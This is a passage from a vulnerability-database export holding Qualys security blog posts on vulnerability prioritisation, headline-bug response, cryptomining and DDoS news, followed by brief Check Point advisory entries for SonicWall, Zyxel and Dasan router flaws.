first.\n\n\u201cWhat ties this all together is Qualys Threat Protection,\u201d Graham said.\n\nRTIs add valuable context to a vulnerability, such as whether: \n\n * It\u2019s being actively attacked in the wild\n * There\u2019s an exploit kit available for it\n * It can lead to high data loss or to a denial of service attack\n * It\u2019s a \u201czero day\u201d with no patch available\n\nRegarding IT assets, you should consider factors such as their role in business operations, their interconnectedness with other assets, their Internet exposure and their user base.\n\nOut of this type of in-depth analysis will emerge a clear picture of your threat landscape, and based on it, you\u2019ll be able to come up with an accurate remediation plan.\n\nQualys TP features include:\n\n * Robust Data Analysis\n\nQualys TP continuously correlates external threat information against your vulnerabilities and IT asset inventory, leveraging Qualys Cloud Platform\u2019s robust back-end engine to automate this large-scale and intensive data analysis process. \n\n * Live Threat Intelligence Feed\n\nAs Qualys engineers continuously validate and rate new threats from internal and external sources, Qualys TP\u2019s Live Threat Intelligence Feed displays the latest vulnerability disclosures and maps them to your impacted IT assets. You can see the number of assets affected by each threat, and drill down into asset details.\n\nQualys Threat Protection, working in tandem with [Qualys AssetView](<https://www.qualys.com/apps/asset-inventory/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>) and [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=trial&leadsource=344565181>), helps you to proactively and continuously detect assets and vulnerabilities, and prioritize remediation in your IT environment.\n\n_Watch a recording of the [webcast](<https://www.qualys.com/webcasts/prioritization-vulnerabilities-modern-it-environment/?utm_source=website&utm_medium=blog&utm_campaign=demand-gen&utm_term=forrester-vulnerability-prioritization-q1-2018&utm_content=webcast&leadsource=344565181>), which has a lot more details, a demo of Qualys Threat Protection, and a Q&A session with the audience._", "cvss3": {}, "published": "2018-05-07T16:00:10", "type": "qualysblog", "title": "How To Prioritize Vulnerabilities in a Modern IT Environment", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-05-07T16:00:10", "id": "QUALYSBLOG:5C311FA52DD78D7015076D492F321DB0", "href": "https://blog.qualys.com/news/2018/05/07/how-to-prioritize-vulnerabilities-in-a-modern-it-environment", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:12", "description": "It\u2019s happening more and more. \n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/IMG_3180-1-600x690.jpg)_Gill Langston, a Qualys Director of Product Management, speaks at RSA Conference 2018_\n\nHigh profile vulnerabilities like Meltdown and Spectre are disclosed, and become headline-grabbing news not just in the technology press, but on general news outlets worldwide.\n\nEven if the vulnerabilities aren\u2019t associated with an attack, the news reports rattle C-level executives, who ask the security team for a plan to address the by now notorious bug, and pronto.\n\nOften, a counter-productive disruption of the normal vulnerability and patch management operations ensues, as those involved scramble to draft a response against the clock in a panic atmosphere, punctuated by confusion and finger-pointing.\n\n\u201cShould I just immediately be jumping and reacting? Should I start deploying patches, and then go from there? I\u2019m going to argue that that\u2019s not always the case,\u201d Gill Langston, a Product Management Director at Qualys, said Wednesday during a presentation at RSA Conference 2018.\n\n### The right approach\n\nWhat security teams should aim for is a coherent, appropriate and rational response plan that is grounded in a factual and comprehensive assessment of the situation, said Langston, whose presentation was titled \u201cThe Sky Is Falling! Responding Rationally to Headline Vulnerabilities.\u201d\n\n\u201cHow can I put this together and send something back to the C-level executives that says: \u2018This is my recommendation for now.\u2019 It may not always be to go deploy the patches,\u201d Langston said. \u201cCreate a plan, and then react, review and improve it over time.\u201d\n\nA key step in dealing effectively with this type of \u201cnews event\u201d vulnerabilities is to have a proper and solid vulnerability management and remediation program in place. That way, organizations are in a better position to do a precise risk assessment of disclosed bugs on a continuous basis, according to Langston.\n\nThis also means that when a high profile vulnerability is announced, security teams have a head start. That way, they don\u2019t have to go back to square one to ensure they are in fact identifying all assets before they can start to react.\n\nOrganizations will be able to pick the most appropriate course of action, which depending on the case, can be to patch right away, to mitigate when remediation is complex, or to monitor and wait before acting.\n\nBelow are three recent examples of each scenario.\n\n### Patch now, unless you \u201cwanna cry\u201d later\n\nMost organizations should have prioritized patching the vulnerability that was exploited by the WannaCry ransomware, way before the attack was unleashed, according to Langston. Instead, the [WannaCry attack](<https://blog.qualys.com/news/2017/05/19/no-more-tears-wannacry-highlights-importance-of-prompt-precise-vulnerability-remediation>) infected 300,000-plus systems and disrupted critical operations globally.\n\nMicrosoft disclosed the Windows vulnerability ([MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) in mid-March 2017 and made a patch available. At the time, Microsoft rated the vulnerability as \u201cCritical\u201d due to the potential for attackers to execute remote code in affected systems.\n\nThe vulnerability also had a number of other red flags that made it stand out as a particularly concerning one. In mid-April, the vulnerability became even more dangerous when the [Shadow Brokers hacker group](<https://blog.qualys.com/securitylabs/2017/04/15/the-shadow-brokers-release-zero-day-exploit-tools>) released an exploit for it called EternalBlue.\n\nSo organizations had a window of about two months to install the patch before WannaCry was unleashed in mid-May. Had most affected systems been patched, WannaCry\u2019s impact would have been minor.\n\n\u201cIn most cases, organizations that follow the standard patching cycle of 30 days, they were already protected. And two months in, you got a second shot at it,\u201d he said.\n\nLangston displayed a graph with Qualys vulnerability scanning data showing that between mid-March and mid-April, detection of affected devices spiked and gradually declined as organizations scanned and patched their systems.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/Slide13.jpg)\n\nHowever, the number of vulnerable systems shoots up after the EternalBlue release, after organizations apparently expanded the initial scope of scanned IT assets. \n\nAnd there\u2019s an important lesson here. \u201cWhen you\u2019re dealing with a vulnerability that can jump around your network, if you\u2019re not identifying all of the assets, you\u2019re already behind the eight ball,\u201d he said.\n\nThe graph shows that widespread patching didn\u2019t fully kick in until after the WannaCry attacks began.\n\nFom WannaCry, Langston identified some key no-nos: A slow identification of all at-risk assets; a tendency by IT operations teams to treat all issues with similar urgency; and a complacency among end users to delay rebooting their machines to finish the patching process.\n\n### Strut your firewall\n\nLangston then discussed the Struts web application vulnerability that was exploited most famously at Equifax, leading to that consumer credit reporting agency's massive data breach. On the same day that Struts was disclosed, and a patch made available, an exploit was also released, so the risk was high.\n\nBecause web application vulnerabilities tend to be difficult to remediate, often requiring a rebuild and long testing cycles, Struts highlights the importance of mitigation. In this case, a good plan would have been to use a[ web application firewall,](<https://blog.qualys.com/technology/2017/03/09/qualys-waf-2-0-protects-against-critical-apache-struts2-vulnerability-cve-2017-5638?>) while patching was in progress, he said. \n\n### Meltdown and Spectre: All bark and no bite?\n\nThen there are the Spectre and Meltdown vulnerabilities, which caused widespread alarm upon their disclosure in early January of this year, but for which there are only ineffective proof-of-concept exploits so far.\n\nIn the panic that was created, vendors such as Microsoft and Intel released faulty patches that IT departments rushed to apply, only to have to react after they caused system problems, including data corruption and performance issues.\n\nQualys data of vulnerability scans for Meltdown shows an initial push to install OS patches, followed by a long plateau of inactivity, as organizations probably weighed the fact that there were no exploits, and that the patches were problematic.\n\nA big lesson from Meltdown and Spectre? \u201cJust because it\u2019s in the news doesn\u2019t mean it\u2019s an emergency,\u201d Langston said. In other words, it\u2019s an example of a scenario where the most prudent thing to do is to monitor the situation and wait, instead of rushing to patch.\n\n### Best practices\n\nLangston recommends these six tips for crafting the best response to a notoriously public vulnerability:\n\n * Identify high-risk vulnerabilities often\n * Track the specific risk to your organization\n * Determine the best course of action\n * Decide when to communicate with internal stakeholders\n * Update regularly\n * Work the plan and improve it\n\nIt\u2019s also key to get buy-in from all the teams that will be involved in drafting, approving and executing the plan, including executives, security operations, DevOps, and IT operations. \u201cBuild the playbook together,\u201d he said.\n\nThe response plan should have four main elements:\n\n * Preparation, which involves ensuring that all assets are identified, that the triggers are documented and that the communication outreach is built\n * Reaction, which involves working the playbook, deciding on the course of action (fix, wait or mitigate), and communicating with your users\n * Revision, which involves reviewing the outcomes of the executed plan, and identifying improvement areas\n * Improvement, which involves collaboration to refine the response, modifying the plan based on findings, and extending the plan to all high-severity vulnerabilities\n\nThis should all amount to a rational, measured response, instead of to a knee-jerk reaction that leads to erratic, misguided decisions and actions.\n\n\u201cIf you don\u2019t have some response plan, you end up bouncing off of each other, pointing fingers and slowing down the entire process,\u201d he said.\n\nBelow is a checklist template that Langston suggests could be helpful in analyzing how to best respond to a \u201cheadline vulnerability\u201d.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/Slide36-1.jpg) \nHere\u2019s how that checklist might look when filled out by a hypothetical organization for the Meltdown vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/04/Slide37.jpg)\n\nThis information can also be enriched and expanded using automated dashboards with threat feeds and other resources that are updated in real time and that allow security teams to do in depth analysis of relevant data.\n\nThe goal is that in the face of a headline-blaring vulnerability, organizations can come up with a well thought and sensible plan. \u201cA methodical approach leads to a rational response,\u201d Langston said.", "cvss3": {}, "published": "2018-04-19T23:00:03", "type": "qualysblog", "title": "The Sky Is Falling! Responding Rationally to Headline Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-04-19T23:00:03", "id": "QUALYSBLOG:1A5EE9D9F7F017B2137FF614703A8605", "href": "https://blog.qualys.com/news/2018/04/19/the-sky-is-falling-responding-rationally-to-headline-vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T20:50:13", "description": "![](https://blog.qualys.com/wp-content/uploads/2018/03/307px-Bitcoin_logo.svg_.png)In this week\u2019s InfoSec news review we\u2019ll dive into cryptomining, get the latest on DDoS amplification, go over recent data breaches, and check out another vendor claiming it can crack iPhones.\n\n### I, me, mine\n\nThe freight train that\u2019s cryptomining shows no sign of slowing down, and the cyber security implications are intensifying accordingly.\n\nThis week alone, Microsoft [detected and disrupted](<http://www.newsweek.com/crypto-mining-malware-outbreak-infected-500000-computers-single-day-836145>) a massive cryptomining malware campaign, a Tesla AWS account[ got hijacked](<http://fortune.com/2018/02/20/tesla-hack-amazon-cloud-cryptocurrency-mining/>), a new mining worm [was discovered](<https://securityboulevard.com/2018/03/worm-infects-redis-and-windows-servers-with-cryptomining-malware/>), and Kaspersky researchers warned about increased[ sophistication of infection methods](<https://www.businesswire.com/news/home/20180305005866/en/Million-Kaspersky-Lab-Identifies-Sophisticated-Hacker-Groups>). \n\nWhile there is a legitimate component to this business, malicious hackers eager to profit are aggressively breaching networks and infecting devices -- PCs, IoT systems, smartphones, servers -- to steal computing power for mining virtual currencies.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/Cryptocurrency_Mining_Farm-600x338.jpg)_A cryptocurrency mining farm in Iceland. (Photo credit: By [Marco Krohn - Own work, CC BY-SA 4.0](<https://commons.wikimedia.org/w/index.php?curid=40495567>))_\n\nThe creation and verification process of virtual currencies like Bitcoin and Monero involves solving lengthy and complex mathematical calculations that require large amounts of [computing power](<https://www.coindesk.com/nvidia-cfo-crypto-mining-demand-beat-expectations-q4/>). Those involved in this [\u201cblockchain\u201d process](<https://www.investopedia.com/tech/how-does-bitcoin-mining-work/>) earn money from it, and the payouts have skyrocketed as the value of these cryptocurrencies has dramatically increased in the past several months.\n\nThat has attracted the attention both of legitimate players -- [individuals](<http://www.businessinsider.com/mining-cryptocurrency-making-a-profit-2018-2>) and [businesses](<https://www.theverge.com/2018/2/13/17008158/salon-suppress-ads-cryptocurrency-mining-coinhive-monero-beta-testing>) -- and, unfortunately, of bad actors, who are using malware to gain unauthorized access to systems they then leverage for mining.\n\n\u201cExploit kits are now delivering coin miners instead of ransomware. Scammers are adding coin mining scripts in tech support scam websites. And certain banking trojan families added coin mining behavior,\u201d Microsoft\u2019s Windows Defender team stated in its [blog post](<https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/>).\n\nBetween September and January, the number of websites hosting cryptomining scripts [spiked 725%](<https://www.cyren.com/blog/articles/increase-in-cryptocurrency-mining-threatens-more-than-just-your-cpu>), Cyren Security Lab said recently. That figure includes domains that are hosting these scripts knowingly, as well as those that have been breached.\n\nCryptomining attacks are purposefully stealthy and silent: They avoid noticeably disrupting breached systems\u2019 operations in order to remain undetected. \u201cFor coin miner malware, persistence is key. These types of malware employ various techniques to stay undetected for long periods of time in order to mine coins using stolen computer resources,\u201d reads Microsoft\u2019s blog post.\n\nThus, cryptomining gives hackers \u201call of the financial upside\u201d of ransomware and other attacks without having to engage the victim and while drawing less law enforcement attention, Cisco\u2019s Talos unit [explained](<http://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html>) in late January.\n\nAs industry analyst Jason Bloomberg put it in a [Forbes column](<https://www.forbes.com/sites/jasonbloomberg/2018/03/04/top-cyberthreat-of-2018-illicit-cryptomining/#4b6bdcc05ae8>) recently, \u201cransomware is oh, so 2017,\u201d as \u201csmart hackers have turned to illicit cryptomining to fill their coffers\u201d lured by a perfect storm of \u201ceasy money, slim chance of detection, and billions of unsuspecting targets that may not even care they\u2019ve been hacked.\u201d\n\nLast month, Imperva [reported](<https://www.imperva.com/blog/2018/02/new-research-crypto-mining-drives-almost-90-remote-code-execution-attacks/>) that cryptomining now drives almost 90% of all remote code execution attacks. Kaspersky Lab put the number of users attacked by malicious miners[ at 2.7 million in 2017](<https://securelist.com/mining-is-the-new-black/84232/>), up 50% from 2016. And according to Check Point, [23% of global organizations](<https://coinjournal.net/23-organizations-globally-affected-crypto-mining-malware-coinhive-says-cybersecurity-firm/>) were affected in January by the Coinhive crypto-mining malware. \n\nMeanwhile, Malwarebytes Labs [ranks](<https://blog.malwarebytes.com/cybercrime/2018/02/state-malicious-cryptomining/>) malicious cryptomining as its top detection since September. While acknowledging that malicious cryptomining appears to be far less dangerous to the user than ransomware, Malwarebytes Labs warned that its effects should not be underestimated. \u201cIndeed, unmanaged miners could seriously disrupt business or infrastructure critical processes by overloading systems to the point where they become unresponsive and shut down,\u201d reads the Malwarebytes Labs post.\n\nOrganizations that have been compromised in recent months include the U.K.\u2019s [Information Commissioner\u2019s Office](<http://www.bbc.com/news/technology-43025788>) (ICO), [U.S. federal courts](<http://fortune.com/2018/02/12/us-courts-coinhive-monero-cryptocurrency-miner/>), [Australian state governments](<https://www.theguardian.com/technology/2018/feb/12/cryptojacking-attack-hits-australian-government-websites>), and the[ LA Times newspaper](<https://nakedsecurity.sophos.com/2018/02/27/unsecured-aws-led-to-cryptojacking-attack-on-la-times/>).\n\nAttack targets have included [vulnerable Jenkins servers](<https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/>), [unsecured Docker containers](<https://blog.aquasec.com/cryptocurrency-miners-abusing-containers-anatomy-of-an-attempted-attack>), [Microsoft Windows systems](<https://securityboulevard.com/2018/03/worm-infects-redis-and-windows-servers-with-cryptomining-malware/>), and browsers. Hackers have used multiple types of attack vehicles, including[ malvertising](<https://threatpost.com/ad-network-circumvents-ad-blocking-tools-to-run-in-browser-cryptojacker-scripts/130161/>), email, malware-laced apps, targeted hits, and exploit kits.\n\nFor example, the coin mining campaign detected by Microsoft\u2019s Windows Defender team this week used variants of the Dofoil/Smoke Loader malware in the form of sophisticated trojans with \u201cadvanced cross-process injection techniques, persistence mechanisms, and evasion methods.\u201d\n\nThe Dofoil trojans attacked Explorer.exe with a \u201cprocess hollowing\u201d code-injection technique that created a new instance of the \u201cc:\\windows\\syswow64\\explorer.exe\u201d process and replaced the legit code with malware.\n\n\u201cThe hollowed Explorer.exe process then spins up a second malicious instance, which drops and runs a coin mining malware masquerading as a legitimate Windows binary, wuauclt.exe,\u201d Microsoft explained. Dofoil uses a customized mining application that can mine different cryptocurrencies. To avoid detection, Dofoil modifies the registry, according to Microsoft.\n\nAnd let us not forget good, old physical -- aka, real world -- security breaches. The Associated Press reported that crooks [stole 600 servers](<https://apnews.com/55117fb55a714e909fb9aaf08841a5d6/Bitcoin-heist:-600-powerful-computers-stolen-in-Iceland>) from data centers in Iceland that were being used for cryptomining. The servers, which haven\u2019t been found, are worth $2 million, and were swiped in a series of four heists in December and January. So far, 11 people have been arrested in connection with the investigation.\n\n### Memcached servers used for DDoS attacks\n\nLast week, we [reported](<https://blog.qualys.com/news/2018/03/02/apple-in-the-infosec-spotlight-as-github-falls-prey-to-amplified-ddos-attack>) on the troubling trend among hackers of using unprotected Memcached servers to dramatically [amplify the intensity](<https://www.darkreading.com/attacks-breaches/memcached-servers-being-exploited-in-huge-ddos-attacks/d/d-id/1331149?>) of their DDoS attacks. GitHub was on the receiving end of such a DDoS attack last week, which at the time was considered [the most intense ever](<http://www.zdnet.com/article/github-was-hit-with-the-largest-ddos-attack-ever-seen/>).\n\nWell, that record lasted for only a few days. This week, Arbor Networks [detected](<https://www.arbornetworks.com/blog/asert/netscout-arbor-confirms-1-7-tbps-ddos-attack-terabit-attack-era-upon-us/>) an even stronger DDoS attack against an unnamed customer of a U.S.-based service provider. The attack, according to Arbor Networks, reached 1.7Tbps at its peak and utilized the same Memcached reflection/amplification attack vector involved in the GitHub attack, which peaked at 1.35Tbps.\n\n \n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/Mar2018_Peak_Attack_Size.png)_(Source: Arbor Networks)_\n\n \n\nThe open source Memcached software is meant to be used behind firewalls on internal networks to boost server performance, but many organizations have made them available from the Internet, and hackers are using them to significantly boost their DDoS attacks.\n\n\u201cWhile the internet community is coming together to shut down access to the many open Memcached servers out there, the sheer number of servers running Memcached openly will make this a lasting vulnerability that attackers will exploit,\u201d reads Arbor Networks\u2019 blog post.\n\nFor detailed information about this trend, in which attackers leverage the User Datagram Protocol (UDP), check out the write-ups from [Akamai](<https://blogs.akamai.com/2018/02/memcached-udp-reflection-attacks.html>), [Link11](<https://www.link11.com/en/blog/new-high-volume-vector-memcached-reflection-amplification-attacks/>) and [Cloudflare](<https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/>).\n\n\u201cAn attacker spoofing the UDP address of their intended victim can send just a small packet of data to a Memcached server, tricking it into blasting as much as 50,000 times more data in response,\u201d [wrote](<https://hotforsecurity.bitdefender.com/blog/world-record-broken-again-ddos-attack-exceeds-1-7-terabits-per-second-19653.html#new_tab>) security analyst Graham Cluley. \u201cThe result? A data tsunami.\u201d\n\nIn encouraging news, eWeek [reported on Friday](<http://www.eweek.com/security/memcached-ddos-attacks-slow-down-as-patching-ramps-up>) that patching efforts were starting to make a dent on these amplified DDoS attacks, according to the latest data gathered by Arbor and Cloudflare. \"We're still seeing lots of them, but their average size is considerably smaller due to ongoing cleanup and mitigation efforts,\" Steinthor Bjarnason, senior network security analyst at Arbor's Netscout unit, told eWEEK.\n\n### Another digital forensics vendor claims it can crack iPhones\n\nOn the heels of Cellebrite\u2019s recent claims that it can unlock and extract data from devices running all modern iOS versions including the most recent one, another digital forensics vendor is quietly making similar promises.\n\nForbes [reported](<https://www.forbes.com/sites/thomasbrewster/2018/03/05/apple-iphone-x-graykey-hack/#7b81709b2950>) this week that a \"mysterious\" company called GrayKey is distributing marketing materials that describe online and offline tools that allow it to unlock devices running iOS 10 and iOS 11, including the latest iPhone X.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/iPhone_X_family_line_up-600x565.jpg)_A second digital forensics vendor now claims it can crack iOS devices, including the iPhone X, pictured here. (Photo credit: Apple)_\n\nForbes\u2019 February [report](<https://www.forbes.com/sites/thomasbrewster/2018/02/26/government-can-access-any-apple-iphone-cellebrite/#cb3ce1f667a0>) on Cellebrite\u2019s claims -- which extend to Android devices as well -- generated a lot of concern among privacy and security experts.\n\nCellebrite has been telling its customers, which are primarily government, military and corporate investigative teams, that it\u2019s able to unlock and extract data from devices running iOS 11, such as the iPhone X, as well as other iPhones, iPads and iPods.\n\nConcerns center on the possibility that whatever technique and knowledge Cellebrite -- and now apparently GrayKey -- may possess could fall into the hands of criminals, be independently replicated by bad actors, or be abused by governments.\n\nThe situation also highlights the ongoing tug-of-war between tech vendors and law enforcement agencies, as the former resist watering down encryption on their products, while the latter argue they need access to devices and data for their investigations.\n\n### Speaking of law enforcement\u2019s distaste for strong encryption\n\nThis week FBI Director Christopher Wray, speaking at Boston College's second annual cybersecurity summit, reiterated his agency\u2019s opposition to \u201cunbreakable encryption,\u201d saying it creates \u201ca major public safety issue,\u201d according to a[ CSO Magazine report](<https://www.csoonline.com/article/3261100/encryption/fbi-chief-calls-for-public-private-detente-on-encryption.html#tk.rss_all>).\n\nSaying that in fiscal 2017 FBI investigators failed to retrieve the contents of 7,775 devices to which judges had granted them access, Wray \u201cmade an impassioned appeal for help from the tech sector and the security community,\u201d CSO reported.\n\nIn related news, it transpired this week that the FBI has established close collaboration with Best Buy\u2019s Geek Squad team of computer repair technicians. According to[ documents obtained by the Electronic Frontier Foundation (EFF)](<https://www.eff.org/deeplinks/2018/03/geek-squads-relationship-fbi-cozier-we-thought>), the FBI has been paying Geek Squad staffers for years for tips about illegal material they may find in the computers they\u2019re fixing.\n\n### Data breach included with your meal, your video game and your credit report\n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/applebees-logo-300x200.jpg)\n\nThe Applebee\u2019s restaurant chain recently [discovered](<https://www.rmhfranchise.com/dataincident/>) malware in the POS (point of sale) systems of more than 160 of its eateries. At risk: Customers\u2019 names, credit and debit card numbers, expiration dates and card verification codes.\n\nThe incidents occurred in recent months, going back to November of last year, but Applebee\u2019s didn\u2019t discover the issue until mid-February.\n\n \n\n\u201cWe\u2019re seeing more of these types of breaches happening\u2026 it\u2019s an industry wide problem as more retailers look to an ecosystem of providers to bring in third party systems like point of sale and inventory management solutions,\u201d Fred Kneip, CEO of security firm CyberGRX [told Threatpost](<https://threatpost.com/pos-malware-found-at-160-applebees-restaurant-locations/130281/>). \u201cAs of today a lot of stores are playing catch up with security, and it can take months or years to realize that compromises have happened on third party systems.\u201d\n\nMeanwhile, customers of games developer Nippon Ichi Software (NIS) America are also at risk for credit card fraud and ID theft, after two of its online stores -- [NIS America](<https://store.nisamerica.com/>) and [SNKonlinestore](<https://snkonlinestore.com/>) -- were hacked.\n\n![](https://blog.qualys.com/wp-content/uploads/2018/03/nisa-logo-300x150.jpg)\n\nThe breach occurred on Jan. 23 and wasn\u2019t discovered until Feb. 26. Compromised data included customer name, address, credit card number, expiration date, security code, and email address.\n\nAccording to the email NIS America sent to customers -- as [re-printed by NintendoLive.com](<http://www.nintendolife.com/news/2018/03/nis_americas_online_stores_hacked_credit_card_details_compromised>) -- customers were redirected to an external web page where their information was captured, before being sent back to the company\u2019s online store to complete the transaction.\n\nAnd in the latest chapter of the monster data breach that just keeps on giving, Equifax [disclosed](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) that there are another 2.4 million Americans whose personal data was stolen by hackers in last year\u2019s infamous and massive hack. That ups the total of people affected to about 148 million. The data thieves accessed Equifax\u2019s systems and data by exploiting the Apache Struts CVE-2017-5638 vulnerability, for which a patch was available.\n\n### In other InfoSec news \u2026\n\n * Duo Security, which provides a two-factor authentication app, is detailing a [serious flaw](<https://duo.com/labs/psa/duo-psa-2017-003>) it recently fixed in its product as well as [the flaw\u2019s root cause](<https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations>) -- SAML vulnerabilities -- which also affects third-party products and services. \u201cDuo disclosed the problem responsibly late last year, and after giving vendors \u2013 including itself \u2013 time to fix the bug, has now gone public with an excellent and educational explanation of what went wrong,\u201d [writes](<https://nakedsecurity.sophos.com/2018/02/28/single-sign-on-authentication-the-bug-that-let-you-logon-as-someone-else/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29>) Lisa Vaas in Sophos\u2019 Naked Security blog.\n * Facebook\u2019s Oculus Rift VR headsets temporarily stopped working after the company [let its security certificate lapse](<https://www.theverge.com/2018/3/8/17095414/oculus-rift-software-fix-certificate-expiry>).\n * MoviePass CEO Mitch Lowe set off privacy alarms when he [boasted](<https://www.csoonline.com/article/3260629/privacy/thanks-to-moviepass-app-tracking-ceo-claims-we-know-all-about-you.html>) this week during a keynote address that his company\u2019s eponymous app has such an ability to track its subscribers -- including via GPS data -- that \u201cwe know all about you.\u201d After the inevitable backlash, the company [the next day](<https://www.theverge.com/2018/3/8/17096442/moviepass-updates-ios-app-unused-location-tracking-features>) announced it was removing the app\u2019s location tracking features.\n\n* * *\n\n_With the [Qualys Cloud Platform ](<https://www.qualys.com/cloud-platform/>)and its suite of natively integrated, self-updating security and compliance [Cloud Apps](<https://www.qualys.com/apps/>), Qualys pro__vides automated, continuous and scalable prevention and response__. __Qualys offers customers [complete and instant visibility of IT assets](<https://www.qualys.com/apps/asset-inventory/>) wherever they reside -- on premises, in clouds, and remote endpoints; comprehensive and continuous [vulnerability management](<https://www.qualys.com/apps/vulnerability-management/>); granular [assessment of secure system configurations](<https://www.qualys.com/apps/policy-compliance/>); [monitoring of file integrity](<https://www.qualys.com/apps/file-integrity-monitoring/>); [web application scanning and firewall](<https://www.qualys.com/apps/web-app-scanning/>); [detection of compromise](<https://www.qualys.com/apps/indication-of-compromise/>); and multiple other security and compliance solutions._", "cvss3": {}, "published": "2018-03-09T21:45:09", "type": "qualysblog", "title": "Cryptomining is all the rage among hackers, as DDoS amplification attacks continue", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-09T21:45:09", "id": "QUALYSBLOG:AB2325C5FBED5CF55517445600D470C1", "href": "https://blog.qualys.com/news/2018/03/09/cryptomining-is-all-the-rage-among-hackers-as-ddos-amplification-attacks-grow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2022-11-09T15:39:33", "description": "A remote code execution vulnerability exists in SonicWall Global Management System. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-27T00:00:00", "type": "checkpoint_advisories", "title": "SonicWall Global Management System Remote Code Execution (CVE-2018-9866)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9866"], "modified": "2022-11-09T00:00:00", "id": "CPAI-2018-0983", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:26:38", "description": "A command injection vulnerability exists in Zyxel EMG2926. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the router.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-16T00:00:00", "type": "checkpoint_advisories", "title": "Zyxel EMG2926 Router OS Command Injection (CVE-2017-6884)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6884"], "modified": "2018-08-16T00:00:00", "id": "CPAI-2018-0844", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:24:48", "description": "An authentication bypass vulnerability exists in Dasan GPON routers. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-13T00:00:00", "type": "checkpoint_advisories", "title": "Dasan GPON Router 